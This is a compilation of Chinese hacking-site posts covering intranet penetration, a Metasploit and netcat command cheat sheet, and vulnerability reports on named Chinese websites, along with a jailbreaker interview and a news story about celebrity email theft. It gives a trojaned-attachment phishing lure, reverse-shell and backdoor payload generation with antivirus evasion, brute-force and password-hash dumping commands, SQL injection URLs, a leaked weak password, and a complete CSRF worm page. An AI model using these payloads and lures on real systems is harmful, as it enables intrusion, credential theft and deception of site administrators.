来源 打造平民化 记住我们网址:内网渗透的思想是源于特洛伊木马的思想---堡垒最容易从内部攻破,一个大型的网站,一个大型的公司,一个大型的目标,在外肉,管理员总会千方百计的加强防范和修补漏洞,常规的方法进去几乎是不可能。内网渗透的突破口是我们如何得到一个内网的个人机或是内网的服务器,我个人的经验有三种,一是从外网分站渗透到内网,二是发木马信得到内网机器,三是利用取得信任得到内网机器。一、从外网分站渗透到内网通常一个大的站点都有很多分站,有很多我们未知的分站或是未知的站点目录,越大的站点展现在我们面前的机会就越多,可以利用传统手法得到一个分站的服务器权限,比如注入,猜解,溢出等。得到分站服务器的情况下有两种思想:一是通过分站渗到主站或是其它分站,需要它们分配有一个内网并没划分vlan的情况,这时可以通过取得密码或是内网嗅探等方式取得更多的分站。二是通过分站服务器的分析,诱使管理员中马,比如在分站服务器取得管理员的密码,收集分站上的邮箱信息,查看分站服务器的ftp信息,收集管理员常用的工具,或是管理员有可能下载回去的文件(通常是管理员传输工具的tools文件里)或是管理员保存在站点目录的工具。二、发木马信取得内网机器这应该算是一种社会工程学与漏洞的结合,比如0day,也就是word或是pdf或是ie0day发挥作用的地方。很多人拿到ie0day是直接用于挂马,其实ie0day发信的价值更高,如何欺骗管理员点击你发的邮件里的url链接也是一种艺术。也可以想想,涉及到他网站的问题,他产品的问题,这样的东西管理员总会点击的,要考虑到管理员点击后会百分之百的中这是一个技术性问题。常规的木马信发送过程中,chm的木马用得更多,因为不被杀,命中率可达百分之百,然后就要考虑到管理员会打开么?即使是客服机器中马也一样的非常有用。比如我在一次木马信的发送中,使用的附件是打包的chm,信的内容是:&使用你们的xx后,我觉得相当不错,不过在使用过程中发现一些bug,不知道是我的机器问题还是你们这方面没有考虑到,具体信息我以图文形式保存在附件中。&当然要找到目标的邮件地址,这个在网站上或是google中很容易找到的。三、利用取得信任得到内网机器 网站管理员或是客服,都会有email或是msn或是QQ,或是现实中的人,我们可以慢慢的套近乎,抓住他的弱点,或是心理,比如他喜欢的东西,慢慢跟他聊天,降低他的心理防线,在成熟的时候发送url,或是打包的软件里捆绑木马,也不是不可以的。具体的涉及到社会工程学方面,主要看自己怎么去发挥。&&内网渗透-----如何打开突破口,这只是平时的一些经验总结,没有具体的步骤,只有一种思想,黑站已经不是一种单纯的玩注入的时代。过段时间将再写《内网渗透-----基本手法》,仅仅做技术上的探讨与分享
获取使用CDN网站的真实IP
来源 打造平民化 记住我们网址:&现在很多网站用了cdn技术,在做一些测试的时候,想获取其服务器真实IP地址就有点困难,不知道现在还有其他什么好的方法呢,整理了下,目前知道如下两种:
1:拿CDN服务器 找出真实IPcache_peer 1.1.1.1 parent 80 0 no-query originservercache_peer_domain 1.1.1.1
2:判断HTTP_X_FORWARDED_FOR是否为空,不为空把这个作为IP地址,否则取得REMOTE_ADDR作为IP地址。如果服务器可以上传文件,可上传文件加如下代码:Request.ServerVariables(&LOCAL_ADDR&)&得到服务器的IP地址Request.ServerVariables(&REMOTE_ADDR&)&得到客户端的IP地址/这个有可能是代理
request.ServerVariables(&HTTP_X_FORWARDED_FOR&)&得到请求客户端真实IP地址
3:可以找二级域名查下
可以参考only_guest 的方法,找个 国外的服务器ping,一般获得都是真实IP。
检测电脑中毒的简单方法
来源 打造平民化 记住我们网址:& 教大家一个能够检测电脑中毒的简单方法啊!可是关于未知木马病毒,杀毒软件就力不从心了。以下是检测电脑能否中毒的几种简略有用办法及步调,但愿能对人人有所协助。&工具/原料 XP电脑一台特洛伊测试木马步骤/方法1、直接翻开任务管理器,检查有没有可疑的进程,不看法的进程可以Google或许百度一下。PS:假如义务治理器翻开后一闪就消逝了,可以断定曾经中毒;假如提醒曾经被治理员禁用,则要惹起警觉!2、翻开冰刃等软件,先检查有没有埋没进程(冰刃中以赤色标出),然后检查系统进程的途径能否准确。PS:假如冰刃无法正常运用,可以断定曾经中毒;假如有赤色的进程,根本可以判别曾经中毒;假如有不在正常目次的正常系统进程名的进程,也可以判别曾经中毒。3、假如进程悉数正常,则应用Wsyscheck等东西,检查能否有可疑的线程注入到正常进程中。PS:Wsyscheck会用分歧颜色来标注被注入的进程和正常进程,假如有进程被注入,不要焦急,先确定注入的模块是不是病毒,由于有的杀软也会注入进程。这样什么木马病毒在以上操作后,可以马上删除哦!&注意事项 测试的木马不要随意点击,可能会造成死机哦 ()
metasploit常用渗透命令
来源 打造平民化 记住我们网址:svn update 升级
./msfweb Web接口127.0.0.1:55555。../msfconsole 字符下的Console。help 帮助show &option& 显示选项search &name& 搜索名字use &exploit name& 使用漏洞show options 显示选项set &OPTION NAME& &option& 设置选项show payloads 显示装置set PAYLOAD &payload name& 设置装置show options 显示选项set &OPTION NAME& &option& 设置选项show targets 显示目标(os版本)set TARGET &target number& 设置目标版本exploit 开始漏洞攻击sessions -l 列出会话sessions -i &ID& 选择会话sessions -k &ID& 结束会话&ctrl& z 把会话放到后台&ctrl& c 结束会话jobs 列出漏洞运行工作jobs -K 结束一个漏洞运行工作show auxiliary 显示辅助模块use &auxiliary name& 使用辅助模块set &OPTION NAME& &option& 设置选项run 运行模块scanner/smb/version 扫描系统版本scanner/mssql/mssql_ping 测试mssql是否在线scanner/mssql/mssql_login 测试登录(暴力或字典)Attacker behind firewall: bind shell正向Target behind firewall: reverse shell反向Meterpreter衔接不懂dos的可以用这个:db_import_nessus_nbe 加载nessus的扫描结果db_import_nmap_xml 加载nmap的扫描结果自动化攻击流程:cd /pentest/exploit/framework3./msfconsoleload db_sqlite3db_destroy pentestdb_create pentestdb_nmap targetIPdb_hostsdb_servicesdb_autopwn -t -p -e字符接口攻击流程:./msfcli | grep -i &name&./msfcli &exploit or auxiliary& S./msfcli &exploit name& &OPTION NAME&=&option& PAYLOAD=&payload name& E做木马后门等:./msfpayload &payload& &variable=value& &output type&S summary and options of payloadC C languageP Perly RubyR Raw, allows payload to be piped into msfencode and other toolsJ JavaScriptX Windows executable./msfpayload windows/shell/reverse_tcp LHOST=10.1.1.1 C./msfpayload windows/meterpreter/reverse_tcp LHOST=10.1.1.1 LPORT=4444 X & evil.exe编码处理就是做免杀:./msfencode &options& &variable=value&./msfpayload linux_ia32_bind LPORT=4444 R | ./msfencode -b &x00&-l./msfpayload linux_ia32_bind LPORT=4444 R | ./msfencode -b &x00&-e PexFnstenvMor -t c
入侵后在windows下添加管理员用户:hostname 查看主机名net users 查看用户net user 用户密码/add 添加用户net localgroup 查看工作组net localgroup administrators 查看管理员组net localgroup administrators x /add 将用户加入管理员组
TFTPcp /pentest/windows-binaries/tools/nc.exe /tmp/传递到tftp上tftp -i 10.1.1.2 GET nc.exe下载
netcat瑞士军刀attacker: 10.1.1.1target: 10.1.1.2nc -v -z 10.1.1.2 1-1024 端口扫描target: nc -lvp 4444 聊天设置(服务)attacker: nc -v 10.1.1.2 4444 聊天设置(客户)target: nc -lvp 4444 & output.txt传输文件(接受)attacker: nc -v 10.1.1.2 4444 & test.txt传输文件(发送)target: nc -lvp 4444 -e cmd.exe Bind shell。attacker: nc -v 10.1.1.2 4444target:nc -lvp 4444 Reverse shell。attacker:nc -v 10.1.1.2 4444 -e /bin/bash
密码字典zcat /pentest/password/dictionaries/wordlist.txt.Z & wordscat words | wc -l显示个数(30多万个)暴力:hydra -l ftp -P words -v targetIP ftp 攻击ftp。hydra -l muts -P words -v targetIP pop3 攻击pop3hydra -P words -v targetIP snmp 攻击snmp攻击microsof VPNnmap -p 1723 targetIPdos2unix wordscat words | thc-pptp-bruter targetIPWYD:wget -r
&accept=pdf 下载pdf文档wyd.pl -o output.txt /cat output.txt | moreSAM文件(windows下的密码文件):%SYSTEMROOT%/system32/config%SYSTEMROOT%/repair备份windows的hash文件:./msfcli exploit/windows/dcerpc/ms03_026_dcom RHOST=targetIP PAYLOAD=windows/meterpreter/bind_tcp Emeterpreter & upload -r /tmp/pwdump6 c:windowssystem32meterpreter & execute -f cmd -cmeterpreter & interact xC:WINDOWSsystem32& pwdump 127.0.0.1 ()
百合网分站的一个注入漏洞及修复方案
来源 打造平民化 记住我们网址:
来源 打造平民化 记住我们网址:/questions.php?action=detail&id=-3916 union select 1,2,3,4,5,6,7,8,user(),database(),11,12,13,14,15,16,17,18,19,20--
作者 Rookie
IT分众子站源代码泄露及修复
来源 打造平民化 记住我们网址:IT分众子站存在目录遍历漏洞,存在svn地址,用户名等敏感信息.可以下载修改应用源代码详细说明:img.itcpn.net 存在目录遍历http://img.itcpn.net/css/.svn
其中包含svn信息用户名弱密码hanlei 123456
修复方案:
控制权限,删除不必要的文件
作者 波波虎
走秀网某频道信息泄露及SQL注射引起的安全问题
来源 打造平民化 记住我们网址:&走秀网某频道SQL注射及引起的安全问题详细说明:首先是一些信息泄漏:/info.php/user.php/test.sql
继而发现SQL注射:/smallc.php?id=1%20and%201=2%20union%20select%201,concat%28user_name,0x7c,password%29,3,4%20from%20zoshow_adminuser
从而成功进入后台,然后在发广告的地方上传拿shell。发现除了那个系统外,还有一个像是重要的业务系统在运行,不过这里就没有深入了。这服务器也是可以用作内网继续渗透的。
除了上面外,好像/install.php这个也算是信息泄漏
修复方案:应该懂!
作者 Jannock
益生康健网Ngnix空字节代码漏洞及修复
来源 打造平民化 记住我们网址:益生康健漏洞nginx空字节可远程执行代码漏洞,可上传图片然后%00.php执行php脚本.
看了下你们公司还是比较大, 漏洞补了后检查下后门.
通过利用此漏洞,攻击者可以导致服务器使用PHP的FastCGI作为PHP的服务器上执行任何公开访问的文件。漏洞证明:
可上传图片,然后利用解析漏洞%00.php执行脚本目录。.
/themes/yeecare1/images/logo.jpg%001.php
在提交漏洞后表示已经删除一句话!修复方案:升级或者修改配置,查后门.
网易微博CSRF漏洞可能造成蠕虫
来源 打造平民化 记住我们网址:1、登陆2、访问http://50.19.159.231/163.html3、回到微博首页,自动发微博加关注漏洞证明:
&html&&head&&title&163 weibo csrf test&/title&&script type="text/javascript"&//follow mefunction addF(){document.getElementById("addF").submit();}//add twitterfunction addT(){document.getElementById("addT").submit();}&/script&&/head&&body onload="addF();addT();"&&form target="addFF" id="addF" method="POST" action="/relation.do?method=follow"&&input type="text" name="userId" value="-396112"&&input type="submit" value="go"&&/form&&form target="addTF" id="addT" method="POST" action="/tweet.do?method=addTweet"&&input type="text" name="content" value="http://163.fm/
"&&input type="submit" value="go"&&/form&&iframe name="addFF"&&/iframe&&iframe name="addTF"&&/iframe&&/body&&/html&修复方案:
检查referer
作者 PiaCa (& )
德国越狱黑客i0n1c采访实录:也有不知道苦衷
来源 打造平民化 记住我们网址:作者:刘菲菲  越狱黑客i0n1c是德国的一名安全专家,曾参与过iOS 4.3.X完美越狱的开发,并且在苹果固件更新的第一天就宣布了New iPad已经成功越狱。几天前,越狱i0n1c曾与另一位炙手可热的越狱大神pod2g在越狱论坛上有过一次争吵,主要的矛盾就是i0n1c坐拥越狱 成果却不愿意分享,而pod2g想要发 布自己的越狱工具。有人因此指责i0n1c自私、虚伪、眼睁睁的看着越狱社区的未越狱用户而不愿意伸出援手。事实上,越狱们也有别人不知道的苦衷。
越狱黑客i0n1c  以下是对越狱i0n1c的一段采访实录:  欢迎i0n1c,我们先从你自己开始今天的采访吧。我们知道你是一名专业的破解者。你对破解技术的激情是怎么产生的?从什么时候你开始接触破解?  我8岁那年就拥有自己的电脑,可一周后就被我弄坏了,我对它做了一些不该做的设置更改。我父母不希望我玩游戏浪费时间,所以我学着自己编程,我 当时 对这些不上档次的事情特别感兴趣。可到了16岁,我开始意识到,通过修改其他人的代码,我可以做到许多不可思议的事情。我起初是修改游戏的代码,但很多年 来我都没去沾染那些侵入互联网或他人邮箱的事情。  对大多数用户来说,你是因破解了iOS 4.3.x、iOS 5.1和5.1.1而出名。我们想知道的是,如何解决iOS的安全问题?  解决iOS安全问题实际上就是要处理任何安全问题,但更具挑战性。另一个不同点是,iOS破解或查找越狱漏洞可以让你直接接触实际消费者,直接 从中 获益,这跟其他领域的破解是不同的。很多时候,安全专家只跟开发者打交道,但软件开发者都不喜欢被指出自己的软件存在漏洞。不过我还是宁愿跟生气的开发者 打交道,也不愿跟生气的越狱用户打交道。  我们听说,你不发布iOS 5.1和5.1.1的越狱是因为,对许多用户来说,越狱意味着安装破解应用。有什么方法可以阻止破解应用的安装吗?  你们听到的并不是事实。&越狱社区&往往喜欢引用你随意的推特,以讹传讹,乱下结论。比如,我每天收到无数留言或邮件,他们听说我在卖越狱工 具,提 出他们想买。我从没说过我要卖越狱工具。我只是在网上讨论过,越狱开发者花时间研究越狱,最后免费放出来,可外面有多少依靠越狱工具聚敛财富的人:  Cydia的越狱应用开发者;  越狱指南的网站或刊物,包括广告;  利用越狱收费的小贩;  利用越狱漏洞传播恶意软件的人;  收集越狱设备数据,并将数据销售给分析网站的人;  利用bootrom漏洞为政府机构开发软件的公司。  &越狱社区&的人们似乎无法理解我的观点,他们花费数个月的时间,将越狱完美了,然后免费放出来,这简直是浪费时间。他们生气是因为他们害怕我的观点影响pod2g,怕他放弃越狱的开发。  说到破解应用,我很肯定越狱工具可以对破解应用的安装做出限制,但也不排除其他安装破解应用的可能途径。毕竟,iOS的破解只需要内核的低级代 码就 可以实现,除非苹果封死这些漏洞,否则总有办法安装破解应用。可这种猫跟老鼠的游戏得不偿失。我不明白,为什么pod2g、肌肉男他们明知道用不了多久苹 果就会封锁漏洞,却也愿意花几天或数个星期的时间开发破解?  越狱用户越狱完全是为了安装破解应用,你认为还有人越狱是为了能自由掌控他们的设备吗?显然,有些人越狱是为了能安装Cydia的最新插件,他 们这 么说只是出于自尊心太强,不可否认,大多数的人越狱之后或多或少都会安装一些破解应用,或解锁iPhone。是的,也有人说他们下载破解应用只是为了试 用,如果觉得好用,他们还会购买正版。我认为苹果可以参考一下这些用户的意见,提供试用的机会。  对我而言,越狱为了什么并不重要,都不能改变我不想浪费时间放出越狱的决定。  5月8日你出版了一本关于iOS破解的书籍,为什么你觉得有必要推出一本破解相关的书籍?  每当一个领域发展了,并积累了许多相关的素材,出一本书也很合乎逻辑。当然,如今我们可以从互联网查上找到大量信息,但重要的信息一般都不会公开。所以,出一本相关书籍,能够帮助该领域的新手快速了解这个领域。从长远的角度来看,这本书将帮助许多人快速破解iOS。  &越狱社区&的人不能从长远的角度理解我出书的好处,这本书将吸引新的人才加入破解团队,可&越狱社区&的人认为,这本书会让苹果扼杀越狱的道 路, 或者认为我出书是为了赚钱。这些人的看法正好反映他们的目光短浅:首先,如果有人能够出一本关于某项技术的书籍,作者肯定会告诉你一些少数人掌握的成果, 尤其是这本书由6个作者编写。许多人错误地以为苹果iOS安全部门的技术人员不给力,实际上,苹果聘请的iOS安全人员技术娴熟,且拥有一些我们越狱团队 所没有的漏洞查找工具。  他们为什么不封锁越狱所用的漏洞?显然,苹果很快封锁那些危及iOS设备安全的漏洞,但并不会关闭越狱所用的漏洞。想想看,越狱带给用户他们想要的功能,长期以往,也给苹果带来利益。我认为苹果并不担心破解应用,因为他们知道如何最大程度地从顾客身上赚取利润。  你对越狱社区有何看法?  我认为&越狱社区&被一些&害虫&污染了。他们不考虑其他人的劳动成果,他们把这些当作理所当然。如果你收到这样的留言,你就知道有些人的妄想 症有 多严重:&没有我们,你什么都不是。我们follow你的Twitter,把你捧红了。&还有类似这样的留言:&给他点教训&。  有谁能长期忍受得了这些?这让我想起Geohot,他曾经忍受不了这些人,关闭了自己的Twitter帐号。人们的这些态度使我意识到,我不值得为他们浪费时间。Geohot和Chronic Dev Team好歹也获得一些资助,所以他们才得以持续下去。  我不喜欢&越狱社区&的另一部分原因是,有些越狱开发者公开称,他们夜以继日,以便能为用户带来新的&变化&。这简直就是哗众取宠,事实上,他们也要等有心情有时间才去研究。  不管怎样,告诉大家真相只会招惹更多人的反感。  感谢你接受我们的采访。最后你有什么要向越狱用户说的吗?  我想说的基本上已经说了。我就等着人们对我新一轮的轰炸吧
克里斯-钱尼当黑客为求快感传明星照
来源 打造平民化 记住我们网址:
斯嘉丽-约翰逊(来源:南方都市报南都网)  还记得去年互联网上疯传的那两张斯嘉丽-约翰逊的裸照么?当时有很多人怀疑,斯嘉丽-约翰逊和杰西卡-奥尔芭、凡妮莎-哈登斯、布莱克-莱弗利、克里斯汀娜-阿奎莱拉等好莱坞一线明星一样,被一个神秘的黑客组织盯上了,但随着FBI的介入,那个&黑了&斯嘉丽-约翰逊的&黑客&很快就被找到。出乎很多人意料的是,根据FBI的起诉书,这个名叫克里斯-钱尼的&&其实并不&黑&,他只是根据&公开资料&就进入了受害者的邮箱,&顺藤摸瓜&拿到了斯嘉丽-约翰逊的裸照。在美版《G Q》一篇杂志的采访中,克里斯-钱尼坦白地承认,他手里有很多好莱坞明星的私人照片,&其中60%是裸照&,但他对这些裸照并没有太多的兴趣,而是对好莱坞如何制作一部电影更感兴趣!  一行代码不会写,靠猜谜猜到了密码  钱尼从没想过,自己会在35岁这年一举成名,虽然成名的方式并不光彩。被FBI抓到前,他是个和祖母同住的单身男人、失业两年、秃顶、体重260磅(约合263斤),从没坐过飞机,卧室只比床大一点点,墙上贴着《搏击俱乐部》的海报,墙角堆着D V D,电视机下放着一排希曼玩偶。按照美国人说法,钱尼是一个典型的Loser(失败者)。  2008年的一个晚上,正在上网的钱尼被一条八卦吸引住了,有人拿到了一张麦莉-塞勒斯的半裸照片并发布到网上。钱尼点了支烟,琢磨起来。钱尼快到30岁才买了第一台电脑,和我们一样只是用来上网瞎逛,一行代码也不会写,但他喜欢解谜游戏,&我当时就在想,如果这种事(裸照外泄)总是在发生,拿到这些照片应该不难。&(来源:南方都市报南都网)  于是,随机列出一串名人,然后将它们依次输入G m ail.就这样花了几天的时间,他找到了一个确实存在的邮箱(他现在已回忆不起这个明星是谁了)。接下来,他用找回密码的方式破解这个邮箱。很多网友都知道,当你想找回你某一个账号的密码的时候,网站往往会问你一些你事先预设好的&密码问题&,比如&你母亲姓什么&&你的出生地&。这些问题对于普通人来说也许是隐私,但对于名人来说,了解到这些并非难事。当时,电脑屏幕上显示的是,&你的(即那个好莱坞明星)宠物叫什么名字?&钱尼想起,曾经有通过帕丽斯-希尔顿的宠物狗的名字&&&Tinkerbell侵入过她的手机,既然帕丽斯的宠物名字那么容易就能在网上搜到,眼下这个人的应该也不难。  最后,钱尼在IM D B(美国著名电影网站,搜集了各种有关电影演员的信息)上找到了他想要的答案。输入宠物的名字后,那位好莱坞名人的所有私人邮件就呈现在了钱尼脏兮兮的显示器上。&我不太想把它比喻成一记精准的长传助攻,但确实很爽。&接下来,钱尼打开了这位名人的联系人列表,把他能认出的每一个名字和地址都存了下来,最后他给这个邮箱设置了自动转发,这个信箱主人以后每一封邮件都会自动转发给钱尼。  尽管这个邮箱里的所有信件就够钱尼研究上一阵子,但当时更吸引他的,是破解更多的邮箱。&只要找到正确的拼图,就能解开谜题。&密码问题五花八门:最喜欢的颜色,小学的名字,社保号码&&然而总有途径可以找到这些问题的答案。  钱尼在母亲和继父资助下生活,没有工作,但这样确保了他有的是时间来看邮件。&就像《星际迷航》一样,我去的都是他人未涉足过的地方。&  
&  克里斯-钱尼  他收藏了大把的明星艳照,但他对电影的制作更有兴趣  钱尼将他从名人邮箱中偷来的照片在自己的电脑上按照名字分门别类收藏好,其中大约60%都是裸照。然而,对于钱尼来说,他更在意的是通过这些邮件,他得以进入好莱坞这个隐秘的世界本身,在他的显示器上,好莱坞所有的内幕交易和日常工作都一览无余。正是这些,让钱尼这个死忠影迷越陷越深。据他所称,他最想看到的,并不是明星的私人照片,而是那些制作人员的工作邮件!&他们到处跑,寻找场地,拍摄照片,再把它们发送给导演。对我来说,能够完整地&参与&这一过程的感觉真是太酷了。&在一个制作人的邮箱里,钱尼见证了《时间规划局》的诞生。他看过剧本、剧照,也看过制作人为主角去脱衣舞俱乐部找&裸替&。  钱尼还迷醉在明星的私人生活中,他在看邮件的时候常常会发出&贵圈很乱&的感慨,&任何人都有可能和任何人约会,让我想起电视剧《新飞越比弗利》。&他见证过某著名男演员和某著名女演员为掩人耳目,约在凌晨三点见面。他也在小报刊登消息之前就发现斯嘉丽-约翰逊和瑞恩-雷蒙德的婚变,&他们在商量,我猜是在分家产&,因为他们的话题总是围绕着家具、照片、纪念品什么的。  &分享&的快感  好莱坞就像个兔子洞,进去得越深,就越想和别人分享秘密,任何人都行。  有一晚,在好奇心和大麻的驱使下,钱尼迈出了第一步。在一个女演员的邮箱里,他看到一封出自某知名男星的邮件,是一张拍自欧洲山脚下的照片,写着&希望你也在这里&。钱尼用这个女演员的名义回了邮件,称赞照片拍得美。点击&发送&的瞬间他一阵战栗,仿佛自己真成了大明星。  2010年11月初,在明星造型师西蒙哈洛奇的邮箱里,钱尼发现了一组克里斯汀娜-阿奎莱拉的试衣照。钱尼在一个明星资讯留言板上随机找了一个人,发邮件告诉对方他认识一个人,弄到了阿奎莱拉的私人照片。  日,八卦网站TMZ打出了&克里斯汀娜-阿奎莱拉:有人偷了我的私人性感照片&的头条,阿奎莱拉的经纪人表示要把黑客揪出来。看到这一切,钱尼感觉&就像肚子挨了一拳&,同时又得到了一丝成就感。很快,他收到了一个名为T rainR eqSucks的的邮件,对方表示愿意为他和买家牵线。钱尼拒绝了。但当对方大加赞赏钱尼的黑客技术、并要他给出点证明来看看时,钱尼便抵挡不住了。他拿出了斯嘉丽-约翰逊的照片,也就是后来在网络上大肆流传的那几张自拍照中的一张&&  日,钱尼在床上听到了敲门声。他打开门,是FBI.在这之前,他曾经也被F B I拜访过一次,当时他未被抓捕,而是被要求提供协助,好让他们能抓到&大鱼&。但这一回,他被围在房间中央,他感觉房间开始旋转、变暗,仿佛一阵龙卷风将他从地板上吸起。他单膝跪地,晕了过去,等他醒了,他成了名人。  钱尼因入侵他人电脑和盗取信息被判有罪,他面临60年的刑期和225万美元(约合1420万人民币)的罚款。据统计,他入侵了至少50个名人的邮箱。不过,钱尼的行为却遭到Josh Train Req Holly的鄙夷:&我认为他做的事情太蠢了,黑名人是小孩玩的,34岁的人玩这个太老了。&  链接  网站为什么需要名人艳照?  现在,名人的艳照的交易已经形成了一个庞大的黑市,一位叫做凯文-布莱特的中间人称,现在一张珍妮佛-洛佩兹或娜塔莉-波特曼的裸照,可以轻松换得100万美元。因为这些照片,可以轻松地为网站带来高流量和付费的订阅用户,一家八卦网站&The Dirty&的拥有者尼克-里奇就把这些艳照简单地成为&五倍&,因为它们会给网站带来五倍于以往的流量,差不多一天就能吸引50万人次的浏览量,换成美金就是每天约5万美元的收入。因此,虽然公布这些照片是违反美国法律的,但一些网站还是铤而走险,上传名人艳照博流量
3351人关注
3351人关注
站长在关注}

我要回帖

更多关于 星际争霸2新手 的文章

更多推荐

版权声明:文章内容来源于网络,版权归原作者所有,如有侵权请点击这里与我们联系,我们将及时删除。

点击添加站长微信